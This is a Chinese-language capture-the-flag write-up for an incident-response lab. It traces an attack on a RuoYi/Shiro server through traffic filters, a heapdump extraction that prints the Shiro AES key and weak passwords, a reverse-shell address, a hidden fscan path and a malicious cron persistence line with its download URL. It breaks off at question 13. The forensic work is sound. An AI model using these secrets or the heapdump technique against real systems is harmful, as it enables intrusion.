玄机实战-应急响应

行业攻防应急响应

1.根据流量包分析首个进行扫描攻击的IP是

http.request

从时间顺序看，有一个IP在扫描目录

flag{192.168.0.223}

2.根据流量包分析第二个扫描攻击的IP和漏扫工具，以flag{x.x.x.x&工具名}

ip.dst == 192.168.0.211&&ip.src==192.168.0.200&&http

在扫描目录的过程有一个目录含有bxss.me域名，为Acunetix的特征

flag{192.168.0.200&Acunetix}

3.提交频繁爆破密钥的IP及爆破次数，以flag{ip&次数}提交

http.request && ip.dst == 192.168.0.211 

发现有一种流量是在爆破login,并且根据remenberMe字段能够判断是在爆破shiro框架的密钥

GET /login HTTP/1.1
Cookie: rememberMe=cL6HQNLGJbwcJNCqcjg8NdJQnmUd7JdI76Az9uqSiLf1ToFQAZHTcfR5vOOMBjaaUfgzOLQi1+zUDjPV2FWJ6R8R+Q2+Y+5HwO6t3NlOkMoOCvmKtQqJbCOYwGWLIzgMWk85CrHoNKO+Vg6cSOIZHWRnT2HfhDUK1eUmj33kDVOdlmgKgrgHhmIGMwwvCiBs
Accept: text/html,application/json,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Host: 192.168.0.211:12333
Connection: keep-alive

HTTP/1.1 200 
Set-Cookie: rememberMe=deleteMe; Path=/; Max-Age=0; Expires=Sun, 28-Jul-2024 02:38:18 GMT; SameSite=lax
Content-Type: application/json;charset=utf-8
Content-Length: 63
Date: Mon, 29 Jul 2024 02:38:17 GMT
Keep-Alive: timeout=60
Connection: keep-alive

因为问的是爆破次数，POST请求登录是不算在里面的，过滤之后在右下角会显示过滤后的分组数量即爆破次数

http.request.uri == "/login" && ip.dst == 192.168.0.211  && ip.src == 192.168.0.226 && http.request.method == GET && frame.len ==632

flag{192.168.0.226&1068}

4.提交攻击者利用成功的密钥，以flag{xxxxx}提交

题目提供了ruoyi-admin.jar,也就是这个12333端口服务的jar包,打开，在其中的application.yml中找到密钥

或者访问:9988端口的/actuator/heapdump,是springboot服务中转存了内存信息的文件,使用JdumpSpider来转存

┌──(mikannse㉿kali)-[~/桌面/tools]
└─$ ~/jre1.8.0_381/bin/java -jar JDumpSpider-1.1-SNAPSHOT-full.jar ../heapdump 
===========================================
SpringDataSourceProperties
-------------
password = null
driverClassName = com.mysql.cj.jdbc.Driver
url = null
username = null

===========================================
WeblogicDataSourceConnectionPoolConfig
-------------
not found!

===========================================
MongoClient
-------------
not found!

===========================================
AliDruidDataSourceWrapper
-------------
password = ruoyi123
jdbcUrl = jdbc:mysql://localhost:3306/ruoyi?useUnicode=true&characterEncoding=utf8&zeroDateTimeBehavior=convertToNull&useSSL=true&serverTimezone=GMT%2B8
username = root

===========================================
HikariDataSource
-------------
not found!

===========================================
RedisStandaloneConfiguration
-------------
not found!

===========================================
JedisClient
-------------
not found!

===========================================
CookieRememberMeManager(ShiroKey)
-------------
algMode = GCM, key = c+3hFGPjbgzGdrC+MHgoRQ==, algName = AES

===========================================
OriginTrackedMapPropertySource
-------------
management.endpoints.web.exposure.include = *
spring.datasource.druid.slave.enabled = null
spring.thymeleaf.cache = null
spring.datasource.druid.validationQuery = SELECT 1 FROM DUAL
spring.datasource.druid.slave.url = 
xss.excludes = /system/notice/*
spring.devtools.restart.enabled = null
pagehelper.params = count=countSql
spring.datasource.druid.initialSize = null
spring.datasource.druid.master.username = root
pagehelper.supportMethodsArguments = null
spring.datasource.druid.master.url = jdbc:mysql://localhost:3306/ruoyi?useUnicode=true&characterEncoding=utf8&zeroDateTimeBehavior=convertToNull&useSSL=true&serverTimezone=GMT%2B8
shiro.rememberMe.enabled = null
swagger.enabled = null
spring.datasource.druid.maxWait = null
server.tomcat.max-threads = null
spring.datasource.druid.filter.stat.slow-sql-millis = null
spring.datasource.druid.filter.wall.config.multi-statement-allow = null
shiro.user.unauthorizedUrl = /unauth
shiro.session.dbSyncPeriod = null
spring.datasource.druid.minIdle = null
ruoyi.copyrightYear = null
xss.urlPatterns = /system/*,/monitor/*,/tool/*
spring.datasource.druid.filter.stat.log-slow-sql = null
ruoyi.profile = /home/security/upload
shiro.user.loginUrl = /login
management.server.port = null
spring.profiles.active = druid
spring.datasource.druid.master.password = ruoyi123
spring.datasource.druid.maxActive = null
spring.datasource.druid.statViewServlet.allow = 
shiro.session.expireTime = null
mybatis.typeAliasesPackage = com.ruoyi.**.domain
spring.servlet.multipart.max-request-size = 20MB
shiro.session.maxSession = null
spring.datasource.type = com.alibaba.druid.pool.DruidDataSource
spring.messages.basename = static/i18n/messages
spring.datasource.druid.testWhileIdle = null
shiro.cookie.httpOnly = null
ruoyi.demoEnabled = null
ruoyi.name = RuoYi
spring.datasource.driverClassName = com.mysql.cj.jdbc.Driver
spring.datasource.druid.minEvictableIdleTimeMillis = null
mybatis.configLocation = classpath:mybatis/mybatis-config.xml
shiro.user.indexUrl = /index
mybatis.mapperLocations = classpath*:mapper/**/*Mapper.xml
management.endpoint.heapdump.enabled = null
management.endpoints.web.base-path = /actuator
spring.jackson.date-format = yyyy-MM-dd HH:mm:ss
server.tomcat.min-spare-threads = null
spring.datasource.druid.statViewServlet.enabled = null
logging.level.org.springframework = warn
shiro.cookie.path = /
spring.datasource.druid.filter.stat.enabled = null
server.port = null
xss.enabled = null
ruoyi.version = 4.7.1
spring.datasource.druid.maxEvictableIdleTimeMillis = null
spring.datasource.druid.webStatFilter.enabled = null
shiro.cookie.domain = 
spring.datasource.druid.statViewServlet.login-username = ruoyi
ruoyi.addressEnabled = null
spring.datasource.druid.filter.stat.merge-sql = null
spring.servlet.multipart.max-file-size = 10MB
server.tomcat.uri-encoding = UTF-8
spring.thymeleaf.mode = HTML
logging.level.com.ruoyi = debug
spring.thymeleaf.encoding = utf-8
shiro.user.captchaType = math
server.servlet.context-path = /
user.password.maxRetryCount = null
spring.datasource.druid.testOnReturn = null
spring.datasource.druid.slave.password = 

===========================================
MutablePropertySources
-------------
awt.toolkit = sun.awt.X11.XToolkit
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
sun.cpu.isalist = 
sun.jnu.encoding = UTF-8
java.runtime.version = 1.8.0_412-8u412-ga-1~22.04.1-b08
java.class.path = /home/security/ruoyi/ruoyi-admin.jar
path.separator = :
java.vm.vendor = Private Build
os.version = 5.15.0-94-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
gen = 
file.encoding = UTF-8
catalina.useNaming = false
spring.beaninfo.ignore = true
java.vm.specification.version = 1.8
os.name = Linux
java.vm.name = OpenJDK 64-Bit Server VM
local.server.port = null
packageName = com.ruoyi.system
user.country = US
autoRemovePre = false
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
sun.java.command = /home/security/ruoyi/ruoyi-admin.jar
java.io.tmpdir = /tmp
catalina.home = /tmp/tomcat.12333.5671829705739952134
java.version = 1.8.0_412
user.home = /root
author = ruoyi
user.language = en
PID = 3607
java.awt.printerjob = sun.print.PSPrinterJob
CONSOLE_LOG_CHARSET = UTF-8
file.separator = /
catalina.base = /tmp/tomcat.9988.4699807479784916975
java.vm.info = mixed mode
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
FILE_LOG_CHARSET = UTF-8
tablePrefix = sys_
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
sun.io.unicode.encoding = UnicodeLittle
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext

===========================================
MapPropertySources
-------------
local.server.port = null

===========================================
ConsulPropertySources
-------------
not found!

===========================================
JavaProperties
-------------
java.util.logging.FileHandler.pattern = %h/java%u.log
awt.toolkit = sun.awt.X11.XToolkit
sun.cpu.isalist = 
sun.jnu.encoding = UTF-8
sun.arch.data.model = 64
password = ruoyi123
catalina.useNaming = false
useUnicode = true
security.overridePropertiesFile = true
id = selectGenTableVo
kaptcha.textproducer.char.length = 4
kaptcha.image.width = 160
sun.boot.library.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/amd64
security.provider.7 = com.sun.security.sasl.Provider
sun.java.command = /home/security/ruoyi/ruoyi-admin.jar
supportMethodsArguments = true
security.provider.9 = sun.security.smartcardio.SunPCSC
java.specification.vendor = Oracle Corporation
security.provider.1 = sun.security.provider.Sun
security.provider.2 = sun.security.rsa.SunRsaSign
kaptcha.obscurificator.impl = com.google.code.kaptcha.impl.ShadowGimpy
security.provider.3 = sun.security.ec.SunEC
params = count=countSql
networkaddress.cache.negative.ttl = 10
security.provider.4 = com.sun.net.ssl.internal.ssl.Provider
security.provider.5 = com.sun.crypto.provider.SunJCE
security.provider.6 = sun.security.jgss.SunProvider
file.separator = /
kaptcha.border.color = 105,179,90
java.specification.name = Java Platform API Specification
java.vm.specification.vendor = Oracle Corporation
dbname = ruoyi
serverTimezone = GMT+8
package.definition = sun.,com.sun.xml.internal.,com.sun.imageio.,com.sun.istack.internal.,com.sun.jmx.,com.sun.media.sound.,com.sun.naming.internal.,com.sun.proxy.,com.sun.corba.se.,com.sun.org.apache.bcel.internal.,com.sun.org.apache.regexp.internal.,com.sun.org.apache.xerces.internal.,com.sun.org.apache.xpath.internal.,com.sun.org.apache.xalan.internal.extensions.,com.sun.org.apache.xalan.internal.lib.,com.sun.org.apache.xalan.internal.res.,com.sun.org.apache.xalan.internal.templates.,com.sun.org.apache.xalan.internal.utils.,com.sun.org.apache.xalan.internal.xslt.,com.sun.org.apache.xalan.internal.xsltc.cmdline.,com.sun.org.apache.xalan.internal.xsltc.compiler.,com.sun.org.apache.xalan.internal.xsltc.trax.,com.sun.org.apache.xalan.internal.xsltc.util.,com.sun.org.apache.xml.internal.res.,com.sun.org.apache.xml.internal.resolver.helpers.,com.sun.org.apache.xml.internal.resolver.readers.,com.sun.org.apache.xml.internal.security.,com.sun.org.apache.xml.internal.serializer.utils.,com.sun.org.apache.xml.internal.utils.,com.sun.org.glassfish.,com.oracle.xmlns.internal.,com.oracle.webservices.internal.,oracle.jrockit.jfr.,org.jcp.xml.dsig.internal.,jdk.internal.,jdk.nashorn.internal.,jdk.nashorn.tools.,jdk.xml.internal.,com.sun.activation.registries.,jdk.jfr.events.,jdk.jfr.internal.,jdk.management.jfr.internal.
sun.boot.class.path = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/resources.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/rt.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/sunrsasign.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jsse.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jce.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/charsets.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/lib/jfr.jar:/usr/lib/jvm/java-8-openjdk-amd64/jre/classes
java.protocol.handler.pkgs = org.springframework.boot.loader
sun.management.compiler = HotSpot 64-Bit Tiered Compilers
java.runtime.version = 1.8.0_412-8u412-ga-1~22.04.1-b08
user.name = root
policy.url.1 = file:${java.home}/lib/security/java.policy
securerandom.source = file:/dev/random
policy.url.2 = file:${user.home}/.java.policy
jdk.tls.disabledAlgorithms = SSLv3, TLSv1, TLSv1.1, RC4, DES, MD5withRSA, DH keySize < 1024, EC keySize < 224, 3DES_EDE_CBC, anon, NULL, include jdk.disabled.namedCurves
policy.ignoreIdentityScope = false
gen = 
file.encoding = UTF-8
java.util.logging.ConsoleHandler.formatter = java.util.logging.SimpleFormatter
kaptcha.textproducer.font.size = 38
jdk.sasl.disabledMechanisms = 
java.io.tmpdir = /tmp
java.version = 1.8.0_412
org.quartz.jobStore.misfireThreshold = 12000
java.vm.specification.name = Java Virtual Machine Specification
PID = 3607
jdk.tls.keyLimits = AES/GCM/NoPadding KeyUpdate 2^37
java.awt.printerjob = sun.print.PSPrinterJob
CONSOLE_LOG_CHARSET = UTF-8
jdk.xml.dsig.secureValidationPolicy = disallowAlg http://www.w3.org/TR/1999/REC-xslt-19991116,disallowAlg http://www.w3.org/2001/04/xmldsig-more#rsa-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#hmac-md5,disallowAlg http://www.w3.org/2001/04/xmldsig-more#md5,maxTransforms 5,maxReferences 30,disallowReferenceUriSchemes file http https,minKeySize RSA 1024,minKeySize DSA 1024,minKeySize EC 224,noDuplicateIds,noRetrievalMethodLoops
kaptcha.noise.impl = com.google.code.kaptcha.impl.NoNoise
java.library.path = /usr/java/packages/lib/amd64:/usr/lib/x86_64-linux-gnu/jni:/lib/x86_64-linux-gnu:/usr/lib/x86_64-linux-gnu:/usr/lib/jni:/lib:/usr/lib
java.vendor = Private Build
tablePrefix = sys_
java.specification.maintenance.version = 5
handlers = java.util.logging.ConsoleHandler
sun.io.unicode.encoding = UnicodeLittle
krb5.kdc.bad.policy = tryLast
java.class.path = /home/security/ruoyi/ruoyi-admin.jar
helperDialect = mysql
java.vm.vendor = Private Build
jdk.security.legacyAlgorithms = SHA1, RSA keySize < 2048, DSA keySize < 2048
jdk.disabled.namedCurves = secp112r1, secp112r2, secp128r1, secp128r2, secp160k1, secp160r1, secp160r2, secp192k1, secp192r1, secp224k1, secp224r1, secp256k1, sect113r1, sect113r2, sect131r1, sect131r2, sect163k1, sect163r1, sect163r2, sect193r1, sect193r2, sect233k1, sect233r1, sect239k1, sect283k1, sect283r1, sect409k1, sect409r1, sect571k1, sect571r1, X9.62 c2tnb191v1, X9.62 c2tnb191v2, X9.62 c2tnb191v3, X9.62 c2tnb239v1, X9.62 c2tnb239v2, X9.62 c2tnb239v3, X9.62 c2tnb359v1, X9.62 c2tnb431r1, X9.62 prime192v2, X9.62 prime192v3, X9.62 prime239v1, X9.62 prime239v2, X9.62 prime239v3, brainpoolP256r1, brainpoolP320r1, brainpoolP384r1, brainpoolP512r1
crypto.policy = unlimited
jceks.key.serialFilter = java.lang.Enum;java.security.KeyRep;java.security.KeyRep$Type;javax.crypto.spec.SecretKeySpec;!*
login.configuration.provider = sun.security.provider.ConfigFile
user.timezone = 
org.quartz.jobStore.maxMisfiresToHandleAtATime = 1
org.quartz.threadPool.threadPriority = 5
host = localhost
kaptcha.textproducer.char.space = 3
java.vm.specification.version = 1.8
os.name = Linux
zeroDateTimeBehavior = CONVERT_TO_NULL
user.country = US
kaptcha.noise.color = white
kaptcha.session.key = kaptchaCode
autoRemovePre = false
jdk.security.caDistrustPolicies = SYMANTEC_TLS
org.quartz.scheduler.instanceId = AUTO
sun.cpu.endian = little
user.home = /root
author = ruoyi
user.language = en
jdk.http.auth.tunneling.disabledSchemes = Basic
en = UTF-8
org.quartz.jobStore.txIsolationLevelSerializable = true
jdk.tls.alpnCharset = ISO_8859_1
org.quartz.jobStore.tablePrefix = QRTZ_
ssl.KeyManagerFactory.algorithm = SunX509
FILE_LOG_CHARSET = UTF-8
port = 3306
.level = INFO
java.awt.graphicsenv = sun.awt.X11GraphicsEnvironment
java.awt.headless = true
com.xyz.foo.level = SEVERE
characterEncoding = utf8
kaptcha.textproducer.font.names = Arial,Courier
ftp.nonProxyHosts = localhost|127.*|[::1]
policy.provider = sun.security.provider.PolicyFile
jdbc = highgo:=com.highgo.jdbc.Driver
path.separator = :
fr = UTF-8
jdk.http.ntlm.transparentAuth = disabled
os.version = 5.15.0-94-generic
java.endorsed.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/endorsed
java.runtime.name = OpenJDK Runtime Environment
keystore.type.compat = true
kaptcha.textproducer.impl = com.ruoyi.framework.config.KaptchaTextCreator
spring.beaninfo.ignore = true
org.quartz.jobStore.isClustered = true
java.vm.name = OpenJDK 64-Bit Server VM
packageName = com.ruoyi.system
java.vendor.url.bug = http://bugreport.sun.com/bugreport/
java.util.logging.FileHandler.formatter = java.util.logging.XMLFormatter
java.util.logging.FileHandler.count = 1
catalina.home = /tmp/tomcat.12333.5671829705739952134
sun.cds.enableSharedLookupCache = false
sun.security.krb5.maxReferrals = 5
catalina.base = /tmp/tomcat.9988.4699807479784916975
java.util.logging.FileHandler.limit = 50000
java.vm.info = mixed mode
keystore.type = jks
org.quartz.scheduler.instanceName = RuoyiScheduler
java.ext.dirs = /usr/lib/jvm/java-8-openjdk-amd64/jre/lib/ext:/usr/java/packages/lib/ext
policy.expandProperties = true
securerandom.strongAlgorithms = NativePRNGBlocking:SUN
user = root
org.quartz.jobStore.clusterCheckinInterval = 15000

===========================================
ProcessEnvironment
-------------
not found!

===========================================
OSS
-------------
not found!

===========================================
UserPassSearcher
-------------
com.ruoyi.web.controller.tool.UserEntity:
[password = admin123, username = ry]
[password = admin123, username = admin]

com.ruoyi.web.controller.demo.controller.UserTableModel:
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 120.0, userName = 测试21, userId = 21, userCode = 1000021]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 160.0, userName = 测试19, userId = 19, userCode = 1000019]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 120.0, userName = 测试12, userId = 12, userCode = 1000012]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 220.0, userName = 测试20, userId = 20, userCode = 1000020]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 180.0, userName = 测试9, userId = 9, userCode = 1000009]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 490.0, userName = 测试23, userId = 23, userCode = 1000023]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 220.0, userName = 测试4, userId = 4, userCode = 1000004]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 280.0, userName = 测试14, userId = 14, userCode = 1000014]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 380.0, userName = 测试13, userId = 13, userCode = 1000013]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 110.0, userName = 测试3, userId = 3, userCode = 1000003]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 210.0, userName = 测试10, userId = 10, userCode = 1000010]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 170.0, userName = 测试8, userId = 8, userCode = 1000008]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 140.0, userName = 测试5, userId = 5, userCode = 1000005]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 160.0, userName = 测试7, userId = 7, userCode = 1000007]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 250.0, userName = 测试25, userId = 25, userCode = 1000025]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 110.0, userName = 测试11, userId = 11, userCode = 1000011]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 570.0, userName = 测试24, userId = 24, userCode = 1000024]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 180.0, userName = 测试2, userId = 2, userCode = 1000002]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 340.0, userName = 测试18, userId = 18, userCode = 1000018]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 330.0, userName = 测试6, userId = 6, userCode = 1000006]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 570.0, userName = 测试15, userId = 15, userCode = 1000015]
[userSex = 0, userPhone = 15888888888, userEmail = ry@qq.com, userBalance = 150.0, userName = 测试1, userId = 1, userCode = 1000001]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 250.0, userName = 测试26, userId = 26, userCode = 1000026]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 210.0, userName = 测试17, userId = 17, userCode = 1000017]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 130.0, userName = 测试22, userId = 22, userCode = 1000022]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 260.0, userName = 测试16, userId = 16, userCode = 1000016]

com.ruoyi.web.controller.demo.controller.UserFormModel:
[userPhone = 15666666666, userName = 测试5, userId = 5, userCode = 1000005]
[userPhone = 15888888888, userName = 测试1, userId = 1, userCode = 1000001]
[userPhone = 15666666666, userName = 测试3, userId = 3, userCode = 1000003]
[userPhone = 15666666666, userName = 测试4, userId = 4, userCode = 1000004]
[userPhone = 15666666666, userName = 测试2, userId = 2, userCode = 1000002]

org.apache.shiro.web.filter.authc.FormAuthenticationFilter:
[failureKeyAttribute = shiroLoginFailure, loginUrl = /login, successUrl = /, usernameParam = username, passwordParam = password]

com.mysql.cj.protocol.a.authentication.AuthenticationLdapSaslClientPlugin:
[firstPass = true]

com.mysql.cj.protocol.a.authentication.CachingSha2PasswordPlugin:
[publicKeyRequested = false]

com.mysql.cj.protocol.a.authentication.Sha256PasswordPlugin:
[publicKeyRequested = false]

com.mysql.cj.NativeCharsetSettings:
[platformDbCharsetMatches = true]

com.mysql.cj.protocol.a.NativeAuthenticationProvider:
[database = ruoyi, useConnectWithDb = true, serverDefaultAuthenticationPluginName = caching_sha2_password, username = root]

com.mysql.cj.conf.HostInfo:
[password = ruoyi123, host = localhost, user = root]

com.mysql.cj.jdbc.ConnectionImpl:
[password = ruoyi123, database = ruoyi, origHostToConnectTo = localhost, user = root]

com.ruoyi.web.controller.demo.domain.UserOperateModel:
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 120.0, userName = 测试21, userId = 21, userCode = 1000021]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 160.0, userName = 测试19, userId = 19, userCode = 1000019]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 120.0, userName = 测试12, userId = 12, userCode = 1000012]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 220.0, userName = 测试20, userId = 20, userCode = 1000020]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 180.0, userName = 测试9, userId = 9, userCode = 1000009]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 490.0, userName = 测试23, userId = 23, userCode = 1000023]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 220.0, userName = 测试4, userId = 4, userCode = 1000004]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 280.0, userName = 测试14, userId = 14, userCode = 1000014]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 380.0, userName = 测试13, userId = 13, userCode = 1000013]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 110.0, userName = 测试3, userId = 3, userCode = 1000003]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 210.0, userName = 测试10, userId = 10, userCode = 1000010]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 170.0, userName = 测试8, userId = 8, userCode = 1000008]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 140.0, userName = 测试5, userId = 5, userCode = 1000005]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 160.0, userName = 测试7, userId = 7, userCode = 1000007]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 250.0, userName = 测试25, userId = 25, userCode = 1000025]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 110.0, userName = 测试11, userId = 11, userCode = 1000011]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 570.0, userName = 测试24, userId = 24, userCode = 1000024]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 180.0, userName = 测试2, userId = 2, userCode = 1000002]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 340.0, userName = 测试18, userId = 18, userCode = 1000018]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 330.0, userName = 测试6, userId = 6, userCode = 1000006]
[userSex = 0, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 570.0, userName = 测试15, userId = 15, userCode = 1000015]
[userSex = 0, userPhone = 15888888888, userEmail = ry@qq.com, userBalance = 150.0, userName = 测试1, userId = 1, userCode = 1000001]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 250.0, userName = 测试26, userId = 26, userCode = 1000026]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 210.0, userName = 测试17, userId = 17, userCode = 1000017]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 130.0, userName = 测试22, userId = 22, userCode = 1000022]
[userSex = 1, userPhone = 15666666666, userEmail = ry@qq.com, userBalance = 260.0, userName = 测试16, userId = 16, userCode = 1000016]

com.alibaba.druid.spring.boot.autoconfigure.DruidDataSourceWrapper:
[password = ruoyi123, accessToUnderlyingConnectionAllowed = true, jdbcUrl = jdbc:mysql://localhost:3306/ruoyi?useUnicode=true&characterEncoding=utf8&zeroDateTimeBehavior=convertToNull&useSSL=true&serverTimezone=GMT%2B8, dbTypeName = mysql, username = root]

com.alibaba.druid.spring.boot.autoconfigure.properties.DruidStatProperties$StatViewServlet:
[loginUsername = ruoyi, loginPassword = 123456, urlPattern = /druid/*]

org.apache.catalina.startup.Tomcat:
[hostname = localhost]


===========================================
CookieThief
-------------
not found!

===========================================
AuthThief
-------------
java.util.LinkedHashMap$Entry:
shiro.user.unauthorizedUrl = /unauth
shiro.cookie.path = /
shiro.cookie.cipherKey = c+3hFGPjbgzGdrC+MHgoRQ==

java.util.Hashtable$Entry:
author = ruoyi
jdk.http.auth.tunneling.disabledSchemes = Basic
jdk.http.ntlm.transparentAuth = disabled


===========================================

flag{c+3hFGPjbgzGdrC+MHgoRQ==}

5.提交攻击者获取到的所有服务的弱口令，多个以&提交

根据上文heapdump的转存结果

flag{ruoyi123&admin123&123456}

6.根据应急响应方法，提交利用漏洞成功的端口，多个以&连接

根据上几问的结果,流量包里看port即可

flag{9988&12333}

7.根据流量包分析，提交攻击者利用密钥探测成功的dnslog地址

dns && ip.src == 192.168.0.211

flag{1dvrle.dnslog.cn}

8.根据流量包分析，提交攻击者反弹shell的地址和端口

ip.src == 192.168.0.211 && frame contains "whoami"

flag{192.168.0.251:8888}

9.攻击者在主机放置了fscan(已改名)，经扫描拿下一台永恒之蓝漏洞主机，以此为线索进行提交fscan绝对路径

root@security:/opt/.f/.s/.c/.a/.n# ls -a
.  ..  F.Sca.n  result.txt

在主机上的/opt目录找到

flag{/opt/.f/.s/.c/.a/.n}

10.另类方法：提交此fscan工具的MD5值

root@security:/opt/.f/.s/.c/.a/.n# md5sum F.Sca.n 
b8053bcd04ce9d7d19c7f36830a9f26b  F.Sca.n

11.攻击者为了权限维持，在主机放置了仿真远控工具，需提交此远控工具的下载地址

/opt/.Abc目录下找到远程下载工具的脚本，虽然脚本已经删除但是通过计划任务还是能够推断是这个是远控工具

#PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# Example of job definition:
# .---------------- minute (0 - 59)
# |  .------------- hour (0 - 23)
# |  |  .---------- day of month (1 - 31)
# |  |  |  .------- month (1 - 12) OR jan,feb,mar,apr ...
# |  |  |  |  .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# |  |  |  |  |
# *  *  *  *  * user-name command to be executed
17 *	* * *	root    cd / && run-parts --report /etc/cron.hourly
25 6	* * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6	* * 7	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6	1 * *	root	test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
*/10 * * * * /bin/bash /opt/.Abc/.qxwc.sh

flag{http://zhoudinb.com:12345/qxwc.sh}

12.攻击者就知道你会这样找到，所以又创建了一条相关的脚本，使用其他方法进行下载，提交脚本的绝对路径

flag{/home/security/upload/.CCC/.happy.sh}

13.攻击者创建了一个隐藏用户，提交此用户的用户名

root@security:~# cat /root/.ssh/id_rsa.pub 
